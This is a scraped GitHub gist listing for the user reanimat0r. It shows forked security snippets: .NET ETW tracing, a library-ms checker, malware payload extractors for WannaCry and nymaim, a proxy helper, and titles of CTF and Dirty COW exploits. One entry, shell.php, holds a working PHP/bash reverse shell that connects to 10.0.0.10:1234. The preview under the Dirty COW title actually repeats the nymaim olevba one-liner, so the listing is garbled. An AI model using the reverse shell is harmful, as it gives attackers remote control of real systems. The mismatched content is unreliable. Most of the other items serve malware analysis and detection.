reanimat0r / dotnet-runtime-etw.py

Created October 24, 2018 19:54 — forked from countercept/dotnet-runtime-etw.py

A research aid for tracing security relevant events in the CLR via ETW for detecting malicious assemblies.

	import time
	import etw
	import etw.evntrace
	import sys
	import argparse
	import threading


	class RundownDotNetETW(etw.ETW):
	def __init__(self, verbose, high_risk_only):

reanimat0r / Get-LibraryMS.ps1

Created October 24, 2018 19:55 — forked from countercept/Get-LibraryMS.ps1

Checks the %USERPROFILE% directory for any file with library-ms extension and extract the CLSID. In particular, the <url> element with shell command.

	function Get-LibraryMS {
	<#
	.SYNOPSIS

	Author: Jayden Zheng (@fuseyjz)

	Checks the %USERPROFILE% directory for any file with library-ms extension and extract the CLSID.
	In particular, <url> element with shell command.

	Blog: pending release

reanimat0r / Onions.md

Created October 24, 2018 21:14 — forked from maestron/Onions.md

Onion Links last Updated 09/02/2018

Onion Collection

reanimat0r / http_proxy_connect.py

Created October 24, 2018 21:15 — forked from frxstrem/http_proxy_connect.py

Establish a socket connection through an HTTP proxy in Python.

	'''
	Establish a socket connection through an HTTP proxy.

	Author: Fredrik Østrem <[email protected]>

	License:
	This code can be used, modified and distributed freely, as long as it is this note containing the original
	author, the source and this license, is put along with the source code.
	'''

reanimat0r / shell.php

Created October 27, 2018 22:46 — forked from rshipp/shell.php

A tiny PHP/bash reverse shell.

	<?php
	exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");

reanimat0r / exp300.py

Created October 28, 2018 21:08 — forked from mak/exp300.py

Exploit for 300 at 34c3ctf

reanimat0r / wcr.py

Created October 28, 2018 21:09 — forked from mak/wcr.py

Extract everything from WannaCry

	import re
	import os,sys
	import pefile
	import struct
	import zipfile
	import hashlib
	import StringIO
	from Crypto import Random
	from Crypto.PublicKey import RSA
	from Crypto.Cipher import PKCS1_v1_5,AES

reanimat0r / hdoc.py

Created October 28, 2018 21:09 — forked from mak/hdoc.py

Extract payload from H-docs

reanimat0r / x.sh

Created October 28, 2018 21:10 — forked from mak/x.sh

one-liner to extract powershell command in recent nymaim's documnets

	( olevba $document \| grep ' = ' \| \
	sed -e's/&/+/g' -e's/NaN/None/g' -e's/ = [^A].($A.)$)/= \1/' -e 's/Array//' \
	-e's/(/[/g' -e's/)/]/g' -e "s#\"$[^\"]$\"$[^\"]$\"#\"\1'\2#" \| \
	grep '\[\\|\+'; \
	echo 'print globals()[sorted(globals(),key=lambda x: type(globals()[x]) == str and len(globals()[x]))[-1]]'
	) \
	\| python2 - \| tr -d '^' \| tr '[:upper:]' '[:lower:]'

reanimat0r / naughtyc0w.c

Created October 28, 2018 21:10 — forked from mak/naughtyc0w.c

exploit for CVE-2016-5195 nothing fancy

	( olevba $document \| grep ' = ' \| \
	sed -e's/&/+/g' -e's/NaN/None/g' -e's/ = [^A].(\(A.)\))/= \1/' -e 's/Array//' \
	-e's/(/[/g' -e's/)/]/g' -e "s#\"\([^\"]\)\"\([^\"]\)\"#\"\1'\2#" \| \
	grep '\[\\|\+'; \
	echo 'print globals()[sorted(globals(),key=lambda x: type(globals()[x]) == str and len(globals()[x]))[-1]]'
	) \
	\| python2 - \| tr -d '^' \| tr '[:upper:]' '[:lower:]'

Bart Black reanimat0r